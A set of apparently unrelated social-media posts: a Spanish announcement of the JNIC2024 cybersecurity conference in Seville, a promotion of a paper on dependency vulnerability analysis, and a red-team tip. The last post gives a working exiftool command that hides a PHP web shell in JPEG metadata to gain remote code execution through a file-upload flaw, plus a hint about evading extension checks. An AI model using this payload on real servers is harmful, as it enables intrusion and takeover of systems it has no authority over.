📢 Ya disponible la web de #JNIC2024 con toda información del Call for Paper, la sede, y comités. #JNIC2024 se celebrará en la @etsii@unisevilla, en colaboración con @INCIBE, y más patrocinadores.
📷Toda la información: https://t.co/bIKvgLXYER
You have a project with dependencies and you want to analyse vulnerabilities. This is our paper on the subject that can help you to address your problem using techniques used in configurability! https://t.co/jqxvDy3Pf6
Fichero de salida con extensión PHP generado a partir de una imagen JPEG. En caso de validación de extensiones por parte del servidor se podría probar mecanismo de ofuscación en el propio nombre a la hora de subir el fichero.
RCE mediante vulnerabilidad del tipo File upload haciendo uso de un JPEG polyglot, almacenando la carga en los metadatos del fichero:
exiftool -Comment="<?php echo 'I- ' . system(\$_GET['command']) . ' -F'; ?>" <IMAGE>.jpg -o <EXPLOIT>.php
#CyberSecurity#infosec#redteam